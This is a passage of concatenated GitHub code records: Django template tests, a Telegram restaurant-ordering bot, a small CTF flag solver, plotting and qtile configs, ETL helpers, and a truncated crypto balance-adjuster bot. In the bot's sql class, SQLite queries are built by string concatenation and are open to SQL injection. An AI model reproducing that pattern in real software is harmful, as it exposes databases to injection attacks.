value\n\n","repo_name":"DxSnow/coding_practice_python","sub_path":"LRU_cache.py","file_name":"LRU_cache.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"69793915848","text":"import fudge\nfrom django.conf import settings\nfrom django.core import urlresolvers\nfrom django.template import (\n    Template, Context, TemplateDoesNotExist, TemplateSyntaxError)\n\nfrom armstrong.core.arm_sections.models import Section\nfrom ._utils import ArmSectionsTestCase\n\n\nclass SectionMenuTestCase(ArmSectionsTestCase):\n    def setUp(self):\n        self.string = \"\"\n        self.context = Context()\n\n    def tearDown(self):\n        # Clear the cached template between test runs\n        if hasattr(self, '_rendered_template'):\n            del self._rendered_template\n\n    @classmethod\n    def setUpClass(cls):\n        \"\"\"Set Template settings to known values\"\"\"\n        cls.old_td, settings.TEMPLATE_DEBUG = settings.TEMPLATE_DEBUG, False\n\n    @classmethod\n    def tearDownClass(cls):\n        settings.TEMPLATE_DEBUG = cls.old_td\n\n    @property\n    def rendered_template(self):\n        \"\"\"Cache the rendered template result during a test run\"\"\"\n        if not hasattr(self, '_rendered_template'):  # pragma: no cover\n            template = \"{% load section_helpers %}\" + self.string\n            self._rendered_template = Template(template).render(self.context)\n        return self._rendered_template\n\n    def test_render_without_parameters(self):\n        self.string = '{% section_menu %}'\n        self.assertNotIn(\"
%s\" % (link, section.title)\n self.assertIn(section_link, self.rendered_template)\n\n def test_section_view_must_be_in_urlconf(self):\n self.string = '{% section_menu section_view=\"nonsense\" %}'\n with self.assertRaises(urlresolvers.NoReverseMatch):\n self.rendered_template\n\n def test_render_with_sections_subset(self):\n subset = Section.objects.filter(full_slug__startswith=\"sports\")\n self.context['subset'] = subset\n self.string = '{% section_menu sections=subset %}'\n\n for section in Section.objects.all():\n if section in subset:\n self.assertIn(section.title, self.rendered_template)\n else:\n self.assertNotIn(section.title, self.rendered_template)\n\n def test_subsections_nest_properly(self):\n subset = Section.objects.filter(full_slug__startswith=\"sports\")\n self.context['subset'] = subset\n self.string = '{% section_menu sections=subset %}'\n\n occurrences = self.rendered_template.count('
    ')\n self.assertEqual(occurrences, 2)\n\n def test_empty_sections_yields_empty_list(self):\n self.context['subset'] = []\n self.string = '{% section_menu sections=subset %}'\n self.assertNotIn(\"
  • \", self.rendered_template)\n","repo_name":"armstrong/armstrong.core.arm_sections","sub_path":"tests/template_tags.py","file_name":"template_tags.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"19604593572","text":"# -*- coding: utf-8 -*-\nimport sqlite3\nimport telebot\nimport config\nimport utils\n\nbot = telebot.TeleBot(config.token)\n\n# Возможно полезная херня с сортированным вложенным меню\n# # Создание сортированного списка разделов меню\n# #sorted_sections_list = sorted(config.menu_keyboard.items(), key=lambda t: t[0]) # Список тьюплов ключ-значение\n# sorted_sections_list = sorted(config.menu_keyboard, key=lambda t: t[0])\n# # Создание словаря клавиатур (клавиатура для каждого раздела)\n# menu_keyboard = [telebot.types.InlineKeyboardMarkup(row_width=2) for i in range(len(sorted_sections_list)+1)]\n# ## Создание сортированного словаря клавиатур (сортировка по названию раздела)\n# #menu_keyboard = OrderedDict(sorted(keyboards_dict.items(), key=lambda t: t[0]))\n# # Создание кнопок для каждой клавиатуры\n# for i, item in enumerate(sorted_sections_list, 1):\n# buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_'+str(i)+'_'+str(j))\n# for j, button_text in enumerate(config.menu_keyboard[item], 1))\n# menu_keyboard[i].add(*buttons)\n# # Добавление клавиатуры для разделов\n# buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_'+str(i))\n# for i, button_text in enumerate(config.menu_keyboard, 1))\n# menu_keyboard[0].add(*buttons)\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n user_id = str(message.from_user.id)\n print('Бот запущен пользователем', user_id)\n utils.set_basket(user_id)\n bot.send_message(message.chat.id, config.main_menu, parse_mode='markdown', reply_markup=main_menu_keyboard)\n\n# ВОЗВРАТ В МЕНЮ\n\n@bot.message_handler(func=lambda item: item.text == config.back_button, content_types=['text'])\ndef back(message):\n print('Пользователь', message.from_user.id, 'вернулся в основное меню')\n bot.send_message(message.chat.id, config.main_menu, reply_markup=main_menu_keyboard)\n\n# ОПИСАНИЕ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[0], content_types=['text'])\ndef description(message):\n print('Пользователь', message.from_user.id, 'открыл \"Описание\"')\n bot.send_message(message.chat.id, config.description, reply_markup=back_keyboard)\n\n# ФОТОГРАФИИ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[1], content_types=['text'])\ndef photos(message):\n print('Пользователь', message.from_user.id, 'открыл \"Фотографии\"')\n bot.send_message(message.chat.id, config.photos, reply_markup=back_keyboard)\n\n# МЕНЮ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[2], content_types=['text'])\ndef menu(message):\n print('Пользователь', message.from_user.id, 'открыл \"Меню\"')\n bot.send_message(message.chat.id, config.menu, reply_markup=menu_keyboard)\n\n@bot.callback_query_handler(func=lambda query: 'menu' in query.data)\ndef menu_section(query):\n bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n section_number = int(query.data[5:])\n section = sorted_sections_list[section_number]\n print('Пользователь', user_id, 'открыл \"Раздел меню', section_number+1, '\" в \"Меню\"')\n\n bot.edit_message_text(section, query.message.chat.id, query.message.message_id)\n # ЗДЕСЬ НУЖНА 
ВЫГРУЗКА БЛЮД РАЗДЕЛА ИЗ БД\n for item in config.menu_keyboard[section]:\n bot.send_message(query.message.chat.id, item, reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: '->' in query.data)\ndef amount_inc(query):\n bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n item = query.data.split('_')[1]\n\n utils.add_to_basket(user_id, item)\n if 'b->' in query.data:\n bot.edit_message_reply_markup(query.message.chat.id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item, basket=True))\n else:\n bot.edit_message_reply_markup(query.message.chat.id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: '<-' in query.data)\ndef amount_dec(query):\n bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n chat_id = query.message.chat.id\n item = query.data.split('_')[1]\n\n utils.remove_amount(user_id, item)\n if not utils.item_amount(user_id, item):\n utils.del_from_basket(user_id, item)\n if 'b<-' in query.data:\n bot.delete_message(chat_id, query.message.message_id)\n bot.send_message(chat_id, config.empty_basket)\n else:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n elif 'b<-' in query.data:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item, basket=True))\n else:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: query.data == 'to_basket')\ndef to_basket(query):\n bot.answer_callback_query(query.id)\n basket(str(query.from_user.id), query.message.chat.id)\n\n# КОРЗИНА\n\ndef basket(user_id, chat_id):\n _basket = utils.get_basket(user_id)\n print('Пользователь', user_id, 'открыл \"Корзина\"')\n print(utils.get_basket(user_id))\n\n if not _basket:\n bot.send_message(chat_id, config.basket)\n bot.send_message(chat_id, config.empty_basket)\n else:\n bot.send_message(chat_id, config.basket, reply_markup=pay_keyboard)\n for item in _basket:\n bot.send_message(chat_id, item, reply_markup=amount_keyboard(user_id, item, basket=True))\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[3], content_types=['text'])\ndef _basket(message):\n basket(str(message.from_user.id), message.chat.id)\n\n@bot.callback_query_handler(func=lambda query: query.data[:6] == 'amount')\ndef item_amount(query):\n print(utils.get_basket(str(query.from_user.id)))\n bot.answer_callback_query(callback_query_id=query.id)\n\n@bot.callback_query_handler(func=lambda query: query.data[:6] == 'remove')\ndef remove(query):\n bot.answer_callback_query(callback_query_id=query.id)\n\n utils.del_from_basket(str(query.from_user.id), query.data[7:])\n bot.delete_message(chat_id=query.from_user.id, message_id=query.message.message_id)\n print(utils.get_basket(str(query.from_user.id)))\n if not utils.get_basket(str(query.from_user.id)):\n bot.send_message(chat_id=query.message.chat.id, text=config.empty_basket)\n\n# ОФОРМЛЕНИЕ ЗАКАЗА\n\n@bot.message_handler(func=lambda item: item.text == config.pay_button, content_types=['text'])\ndef payment(message):\n print('Пользователь', message.from_user.id, 'начал оформление заказа')\n pay_way_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n pay_way_keyboard.add(telebot.types.KeyboardButton(config.pay_way[0]),\n 
telebot.types.KeyboardButton(config.pay_way[1]),\n telebot.types.KeyboardButton(config.back_button))\n bot.send_message(message.chat.id, config.choose_pay_way, reply_markup=pay_way_keyboard)\n\n# ЗДЕСЬ НУЖНА ВЫГРУЗКА ДАННЫХ ПО КАЖДОМУ ПРОДУКТУ ИЗ КОРЗИНЫ ИЗ БД\n@bot.message_handler(func=lambda item: item.text == config.pay_way[0], content_types=['text'])\ndef pay_newAPI(message):\n print('Пользователь', message.from_user.id, 'оформляет заказ через Telegram')\n bot.send_message(message.chat.id, config.view_basket, reply_markup=back_keyboard)\n msg = ''\n price = 0\n for item in utils.get_basket(str(message.from_user.id)):\n # НАДЕЮСЬ, ЧТО НУЖНО ДЕЛАТЬ ПОЯСНЕНИЙ НЕ ТРЕБУЕТСЯ, НО ЕСЛИ ЧТО, ЗВОНИ :-*\n amount = utils.item_amount(str(message.from_user.id), item)\n msg += ' - ' + item + ': ' + str(amount) + '\\n'\n price += amount * 10000\n prices = [telebot.types.LabeledPrice(config.check_num, price)]\n\n new_pay = telebot.types.InlineKeyboardMarkup(row_width=1)\n new_pay.add(telebot.types.InlineKeyboardButton(text=config.pay, pay=True))\n\n bot.send_invoice(chat_id=message.chat.id,\n title=config.check_num,\n description=msg,\n invoice_payload='invoice',\n provider_token=config.provider_token,\n start_parameter='invoice',\n currency='rub',\n prices=prices,\n need_name=True,\n need_phone_number=True,\n need_shipping_address=True,\n is_flexible=True,\n reply_markup=new_pay)\n\n@bot.shipping_query_handler(func=lambda query: True)\ndef shipping(shipping_query):\n shipping_options = []\n\n shipping_option = telebot.types.ShippingOption('delivery', 'Доставка курьером')\n shipping_option.add_price(telebot.types.LabeledPrice('Курьер', 10000))\n shipping_options.append(shipping_option)\n\n shipping_option = telebot.types.ShippingOption('sam', 'Самовывоз')\n shipping_option.add_price(telebot.types.LabeledPrice('Самовывоз', 0))\n shipping_options.append(shipping_option)\n\n bot.answer_shipping_query(shipping_query_id=shipping_query.id, ok=True, shipping_options=shipping_options,\n error_message=config.error_answer_query)\n\n\n@bot.pre_checkout_query_handler(func=lambda query: True)\ndef checkout(pre_checkout_query):\n bot.answer_pre_checkout_query(pre_checkout_query_id=pre_checkout_query.id,\n ok=True,\n error_message=config.error_pre_checkout)\n\n\n@bot.message_handler(content_types=['successful_payment'])\ndef got_payment(message):\n print('Пользователь', message.from_user.id, 'оформил заказ')\n for item in utils.get_basket(str(message.from_user.id)):\n utils.del_from_basket(str(message.from_user.id), item)\n bot.send_message(chat_id=message.chat.id,\n text=config.successful_payment.format(message.successful_payment.total_amount / 100,\n message.successful_payment.currency),\n parse_mode='Markdown', reply_markup=main_menu_keyboard)\n\nif __name__ == '__main__':\n\n main_menu_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=2)\n buttons = (telebot.types.KeyboardButton(text=button_text) for button_text in config.main_menu_keyboard)\n main_menu_keyboard.add(*buttons)\n\n back_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n back_keyboard.add(telebot.types.KeyboardButton(text=config.back_button))\n\n def amount_keyboard(user_id, item, basket=False):\n if basket:\n amount = telebot.types.InlineKeyboardMarkup()\n amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='b<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n 
telebot.types.InlineKeyboardButton(text='->', callback_data='b->_' + item))\n amount.add(telebot.types.InlineKeyboardButton(text=config.del_from_basket,\n callback_data='remove_' + item))\n elif utils.item_amount(user_id, item):\n amount = telebot.types.InlineKeyboardMarkup()\n amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n telebot.types.InlineKeyboardButton(text='->', callback_data='->_' + item))\n amount.add(telebot.types.InlineKeyboardButton(text=config.to_basket, callback_data='to_basket'))\n else:\n amount = telebot.types.InlineKeyboardMarkup()\n amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n telebot.types.InlineKeyboardButton(text='->', callback_data='->_' + item))\n\n return amount\n\n ### ЗДЕСЬ НУЖНА ВЫГРУЗКА РАЗДЕЛОВ ИЗ БД\n menu_keyboard = telebot.types.InlineKeyboardMarkup(row_width=2)\n sorted_sections_list = list(config.menu_keyboard)\n sorted_sections_list.sort()\n buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_' + str(i))\n for i, button_text in enumerate(sorted_sections_list))\n menu_keyboard.add(*buttons)\n ###\n\n pay_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n pay_keyboard.add(telebot.types.KeyboardButton(text=config.pay_button),\n telebot.types.KeyboardButton(text=config.back_button))\n\n hidden_keyboard = telebot.types.ReplyKeyboardRemove()\n\n\nclass sql:\n def tovars(self):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n company = \"KFC\"\n cursor.execute(\"\"\"\n SELECT Блюдо\n FROM '\"\"\" + str(company) + \"' ORDER BY Блюдо\")\n\n tovars = cursor.fetchall()\n conn.close()\n return tovars\n\n def kitchen(self):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n cursor.execute(\"\"\"\n SELECT Название\n FROM Кухня\n ORDER BY Название;\n \"\"\")\n kitchen = cursor.fetchall()\n conn.close()\n return kitchen\n def bludo_po_kuhne(self, kitchen_vibor):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n self.kitchen_vibor = \"Фастфуд\"\n cursor.execute(\"\"\"\n SELECT Блюдо\n FROM KFC\n WHERE Кухня = '\"\"\" + str(kitchen_vibor) + \"'\")\n kitchen_price = cursor.fetchall()\n conn.close()\n return kitchen_price\n def bludo_info(self, bludo):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n # Вывод всей информации о блюде\n self.bludo = \"Биггер\"\n cursor.execute(\"\"\"\n SELECT *\n FROM KFC\n WHERE Блюдо = '\"\"\" + str(bludo) + \"'\")\n info_food = cursor.fetchall()\n conn.close()\n return info_food\n\n\n\n\n bot.polling(none_stop=True)\n\n\n","repo_name":"eskidnov/restaurant_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":15636,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26234542611","text":"#!/usr/bin/env python3.4\n\nimport re\n\nwith open('data','rt') as f:\n\tdata = f.read().strip().split('\\n')\ncount = {}\nfor d in data:\n\tcount[d] = d.count('a')\ncount_s = sorted(count.items(), key=lambda x:x[1])\n\nkey = [0]*47\ni = 0\nequ=list(map(lambda x:x[0],count_s))\nfor a in range(len(equ)):\n\tfor c in range(33,127):\n\t\tp = re.sub('a\\[\\d+\\]',str(c),equ[a])\n\t\tif eval(p):\n\t\t\tkey[i] = c\n\t\t\tequ = list(map(lambda 
x:x.replace('a[%d]'%i,str(key[i])),equ))\n\t\t\ti += 1\n\t\t\tbreak\nfkey = ''\nfor c in key:\n\tfkey += chr(c)\nprint(fkey)\n","repo_name":"qq53/ctf","sub_path":"simplexue/flag/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4575254323","text":"import sys\nimport csv\nimport matplotlib.pyplot as plt\nfrom datetime import *\nfrom ggplot import *\nimport matplotlib.dates as dt\n\nf = open(sys.argv[1])\nreader = csv.reader(f,delimiter = ',')\n\nNYPD = {}\nd = {}\nTLC = {}\nDPR = {}\ncount = 0\nnext(reader)\nfor i in reader:\n\tcount = d.setdefault(i[3], 0)\n\td[i[3]] = count + 1\n\ntopk = sorted(d.items(), key = lambda x:x[1], reverse = True)\nk = int(sys.argv[2])\ntopk = [x for x,y in topk]\ntopk = topk[:k] \nstart_date = datetime.strptime('06/01/2013 00:00:00 AM', '%m/%d/%Y %H:%M:%S %p')\nf.close()\nf = open(sys.argv[1])\nreader = csv.reader(f,delimiter = ',')\nnext(reader)\ncomplete = {}\nfor i in topk:\n\tcomplete[i] = {}\nfor i in reader:\n\tif i[3] in topk:\n\t\tdate = datetime.strptime(i[1],'%m/%d/%Y %H:%M:%S %p')\n\t\tdelta = date - start_date\n\t\tif int(delta.days) > 90:\n\t\t\tcontinue\n\t\tcount = complete[i[3]].setdefault(int(delta.days), 0)\n\t\tcomplete[i[3]][int(delta.days)] = count + 1\nlabels = complete.keys()\nXY = complete.values()\n\nfig,ax = plt.subplots()\nL = []\nfor i in xrange(0,91):\n\tL.append(start_date + timedelta(days = i))\ncolors = ['b','g','r','c','m','y','k']\nc = 0\nfor i in labels:\n\tc += 1\n\tL = []\n\tX = complete[i].keys()\n\tY = complete[i].values()\n\tfor j in xrange(0,len(X)):\n\t\tL.append(start_date + timedelta(days = j))\n\n\tplt.xticks(X, L, fontsize = 6)\n\tplt.plot(L, Y, colors[c%7], label = i)\n\nplt.legend(loc = 2)\nax.xaxis.set_major_formatter(dt.DateFormatter(\"%b %d %Y\"))\nax.xaxis.set_major_locator(dt.DayLocator((1,8,16,24)))\n\nplt.xlabel('Date')\nplt.ylabel('Number of Complaints')\nplt.show()\n\n\n","repo_name":"rybo449/Matplotlib-Visualizations","sub_path":"problem2_2.py","file_name":"problem2_2.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8589869406","text":"from libqtile.config import Match\nfrom libqtile.layout.columns import Columns\nfrom libqtile.layout.floating import Floating\nfrom libqtile.layout.max import Max\nfrom libqtile.layout.xmonad import MonadWide\n\nfrom colors import OneDark as c\n\n_layout_theme = {\n \"border_width\": 4,\n \"margin\": 8,\n \"border_focus\": c.base0F,\n \"border_normal\": c.base00,\n}\nlayouts = [\n Columns(name=\"cols\", num_columns=3, **_layout_theme),\n Max(),\n # Try more layouts by unleashing below layouts.\n # Stack(num_stacks=2),\n # Bsp(),\n # Matrix(),\n # MonadTall(),\n MonadWide(name=\"wide\", **_layout_theme),\n # layout.RatioTile(),\n # layout.Tile(),\n # layout.TreeTab(),\n # layout.VerticalTile(),\n # layout.Zoomy(),\n]\n\nfloating_layout = Floating(\n float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n *Floating.default_float_rules,\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n Match(title=\"pinentry\"), # GPG key password entry\n 
]\n)\n","repo_name":"jamestrew/dotfiles","sub_path":"qtile/.config/qtile/_layouts.py","file_name":"_layouts.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40344168081","text":"\"\"\"\nThis file contains helper methods used throughout the phases of the ETL pipeline\n\"\"\"\n\nfrom datetime import datetime\nimport pandas as pd\nfrom constants import dataframe\n\ndef create_df(columns):\n \"\"\"\n Create a template dataframe based on columns provided\n\n Input : dictioary - { column name : column data type }\n Output : dataframe \n \"\"\"\n data_frame = pd.DataFrame(columns)\n return data_frame\n\ndef create_template_restaurants_df():\n \"\"\"\n Create a template dataframe for the cleaned restaurants data\n (used for Q1 CSV output)\n\n Input : None\n Output : dataframe \n \"\"\"\n columns = {\n dataframe.RESTAURANT_ID: pd.Series(dtype='int'),\n dataframe.RESTAURANT_NAME: pd.Series(dtype='str'),\n dataframe.COUNTRY: pd.Series(dtype='str'),\n dataframe.CITY: pd.Series(dtype='str'),\n dataframe.USER_RATING_VOTES: pd.Series(dtype='str'),\n dataframe.USER_AGGREGATE_RATING: pd.Series(dtype='str'),\n dataframe.CUISINES: pd.Series(dtype='str'),\n dataframe.COUNTRY_ID: pd.Series(dtype='int'),\n dataframe.RATING_TEXT: pd.Series(dtype='str'),\n dataframe.PHOTO_URL: pd.Series(dtype='str'),\n dataframe.EVENTS: pd.Series(dtype='object'),\n dataframe.EVENT_ID: pd.Series(dtype='str'),\n dataframe.EVENT_TITLE: pd.Series(dtype='str'),\n dataframe.EVENT_START_DATE: pd.Series(dtype='str'),\n dataframe.EVENT_END_DATE: pd.Series(dtype='str')\n }\n\n data_frame = create_df(columns)\n return data_frame\n\ndef create_template_events_df():\n \"\"\"\n Create a template dataframe for the cleaned restaurant events data\n in Apr 2019 (used for Q2 CSV output)\n\n Input : None\n Output : dataframe \n \"\"\"\n columns = {\n dataframe.EVENT_ID: pd.Series(dtype='str'),\n dataframe.RESTAURANT_ID: pd.Series(dtype='int'),\n dataframe.RESTAURANT_NAME: pd.Series(dtype='str'),\n dataframe.PHOTO_URL: pd.Series(dtype='str'),\n dataframe.EVENT_TITLE: pd.Series(dtype='str'),\n dataframe.EVENT_START_DATE: pd.Series(dtype='str'),\n dataframe.EVENT_END_DATE: pd.Series(dtype='str'),\n }\n\n data_frame = create_df(columns)\n return data_frame\n\ndef map_country_code_to_country_name(d_countries, country_code):\n \"\"\"\n Returns the country name associated with the provided country code\n based on the countries dictionary of { country code : country name }\n If country code does not exist, return NA\n\n Input : dictionary, string\n Output : string \n \"\"\"\n if country_code in d_countries:\n return d_countries[country_code]\n return dataframe.NA_VALUE\n\ndef event_occurs_within_dates(\n event_start,\n event_end,\n fixed_start,\n fixed_end\n):\n \"\"\"\n Check whether an event occurs within a date range \n\n Input : string, string, string, string\n Output : boolean \n \"\"\"\n return (\n event_start >= datetime.strptime(fixed_start, '%Y-%m-%d')\n and event_end <= datetime.strptime(fixed_end, '%Y-%m-%d')\n )\n\n\ndef replace_na_cells(data_frame, replacement_str):\n \"\"\"\n Replace NaN cells in the dataframe with a provided\n replacement string\n\n Input : dataframe, string \n Output : dataframe \n \"\"\"\n data_frame = data_frame.fillna(replacement_str)\n return data_frame\n\ndef extract_photo_urls(event):\n \"\"\"\n Obtain photo URLs for all photos of each event.\n If there's multiple photo URLs, they are separated by\n a comma 
delimiter\n\n Input : list\n Output : string\n \"\"\"\n if 'photos' in event:\n photo_urls = list(map(lambda photo: photo['photo']['url'], event['photos']))\n photo_urls_string = \",\".join(photo_urls)\n return photo_urls_string\n return dataframe.NA_VALUE\n","repo_name":"ongyongen/de","sub_path":"etl_pipeline/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17917237372","text":"import sys\nimport ccxt\nimport time\nimport signal\nimport re\nimport os\nimport uuid\nimport logging\nfrom threading import Thread, Lock\nimport argparse\nsignal.signal(signal.SIGINT, lambda x,y: os._exit(0))\nfrom flask_socketio import SocketIO, emit\nfrom datetime import datetime\nfrom decimal import Decimal\ndir_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = dir_path+'/../libs'\nsys.path.append(lib_path)\nfrom exchange_lib import *\nfrom common import log, socket_emit\n\n\ndef arg_parser(web_inputs=None):\n args_dict = web_inputs\n if not web_inputs:\n parser = argparse.ArgumentParser(description='Nico bot')\n parser.add_argument('ex_and_coin', type=str, help='Exchanges and coins')\n parser.add_argument('fees', type=str, help='Order fees for the coin and target coin')\n parser.add_argument('target_coin', type=str, help='Target coin')\n parser.add_argument('buyback_exchange', type=str, help='Buyback exchange')\n parser.add_argument('-s', '--threshold', type=str, default='0', help='threshold to adjust (default 0)')\n parser.add_argument('-i', '--interval', type=str, default='1', help='Checking interval in minute (default 1m)')\n parser.add_argument('-b', '--buyback', type=bool, nargs='?', const=True, default=False, help='Buyback')\n args = parser.parse_args()\n args_dict = vars(args)\n # end if\n\n ex_and_coin_list = args_dict.get('ex_and_coin')\n fees = args_dict.get('fees')\n ex_and_coin_fee_dict = {}\n kra_coins = []\n bin_coins = []\n \n for coin, fee in zip(ex_and_coin_list.split('-'), fees.split('-')):\n fee = Decimal(fee)\n ex_id = coin[:3]\n coin_fee_list = ex_and_coin_fee_dict.get(ex_id)\n if not coin_fee_list:\n coin_fee_list = []\n coin_fee_list.append((coin[3:], fee))\n ex_and_coin_fee_dict.update({ex_id: coin_fee_list})\n\n target_coin = args_dict.get('target_coin')\n buyback_exchange = args_dict.get('buyback_exchange')\n checking_interval = float(args_dict.get('interval'))\n threshold = Decimal(args_dict.get('threshold'))\n buyback = args_dict.get('buyback')\n if buyback == 'False':\n buyback = False\n elif buyback == 'True':\n buyback = True\n\n return {\n 'ex_and_coin_fee': ex_and_coin_fee_dict,\n 'checking_interval': checking_interval,\n 'target_coin': target_coin,\n 'buyback_exchange': buyback_exchange,\n 'threshold': threshold,\n 'buyback': buyback,\n 'account_sell_buy': args_dict['account_sell_buy'],\n 'account_buy_sell': args_dict['account_buy_sell'],\n 'own_username': args_dict['own_username']\n }\n\n\nclass balance_adjuster_bot():\n def __init__(self):\n self._exchanges = {}\n self._adjuster_coins = {}\n self._adjuster_coins_in_total = {}\n self._target_coin = ''\n self._buyback_exchange = ''\n self._threshold = 0\n self._buyback = True\n self._args = None\n self._terminate = False\n self._socketio = None\n self._channel_uuid = ''\n self._socketdata = {}\n self._logger = logging.getLogger('BalanceAdjusterBot')\n\n def terminate(self):\n self._terminate = True\n\n def _config_logger(self):\n self._logger.setLevel(logging.DEBUG)\n 
script_path = os.path.dirname(os.path.realpath(__file__))\n file_name = 'balance_adjuster_cmd_' + datetime.now().strftime('%Y-%m-%dT%H-%M-%S')\n if self._socketio:\n file_name = 'balance_adjuster_web_' + self._channel_uuid\n # create file handler which logs even debug messages\n fh = logging.FileHandler(script_path + '/../web/logs/'+ str(file_name) + '.log')\n fh.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n self._logger.addHandler(fh)\n\n def _log(self, data='', severity='info'):\n log(data, self._logger, self._socketio, self._channel_uuid, log_severity=severity)\n\n def _get_target_coin_amount_from_coin(self, coin_fee_pair):\n # Check if this coin is direct coin to target coin\n target_coin_amount = Decimal(0)\n buyback_order_amount = Decimal(0)\n order_info = ()\n if coin_fee_pair[-1] != None:\n coin, fee, pair = coin_fee_pair\n if coin == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = pair[:3]\n pair = pair[3:]\n buyback_order_side = ''\n buyback_order_amount = Decimal(0)\n coin_position_in_pair = 1 if pair.find(coin) == 0 else 2\n order_book = self._exchanges.get(exchange_id).fetch_order_book(pair, 1)\n pair_price = 0\n coin_amount = self._adjuster_coins_in_total[coin_fee_pair][2]\n # Return None if price isn't initiated yet\n if order_book == (None, None):\n return False, Decimal(0), ()\n\n if coin_position_in_pair == 1:\n buyback_order_amount = abs(coin_amount)\n if coin_amount < 0:\n buyback_order_side = 'buy'\n pair_price = Decimal(str(order_book[1][0]))\n target_coin_amount = coin_amount * pair_price * (1 + fee/100)\n elif coin_amount > 0:\n buyback_order_side = 'sell'\n pair_price = Decimal(str(order_book[0][0]))\n target_coin_amount = coin_amount * pair_price * (1 - fee/100)\n elif coin_position_in_pair == 2:\n if coin_amount < 0:\n buyback_order_side = 'sell'\n pair_price = Decimal(str(order_book[0][0]))\n target_coin_amount = coin_amount / pair_price * (1 + fee/100)\n buyback_order_amount = abs(target_coin_amount)\n elif coin_amount > 0:\n buyback_order_side = 'buy'\n pair_price = Decimal(str(order_book[1][0]))\n target_coin_amount = coin_amount / pair_price * (1 - fee/100)\n buyback_order_amount = target_coin_amount\n order_info = (pair, buyback_order_side, buyback_order_amount, pair_price)\n # TODO will adapt later to new requirement. 
Indirect coin, hava intermediate coin\n else:\n coin, fees, _ = coin_fee_pair\n pair1, fee1 = fees[0]\n buyback_order_side1 = ''\n buyback_order_amount1 = Decimal(0)\n coin_position_in_pair = 1 if pair1.find(coin) == 0 else 2\n order_book1 = self._exchanges.get(exchange).fetch_order_book(pair1, 1)\n pair1_price = Decimal(0)\n coin_amount = self._adjuster_coins[exchange][coin_fee_pair][2]\n intermediate_coin_amount = Decimal(0)\n # Return None if price isn't initiated yet\n if order_book1 == (None, None):\n return False, Decimal(0), ()\n\n if coin_position_in_pair == 1:\n buyback_order_amount1 = abs(coin_amount)\n if coin_amount < 0:\n buyback_order_side1 = 'buy'\n pair1_price = Decimal(str(order_book1[1][0]))\n intermediate_coin_amount = coin_amount * pair1_price * (1 + fee1/100)\n elif coin_amount > 0:\n buyback_order_side1 = 'sell'\n pair1_price = Decimal(str(order_book1[0][0]))\n intermediate_coin_amount = coin_amount * pair1_price * (1 - fee1/100)\n elif coin_position_in_pair == 2:\n if coin_amount < 0:\n buyback_order_side1 = 'sell'\n pair1_price = Decimal(str(order_book1[0][0]))\n 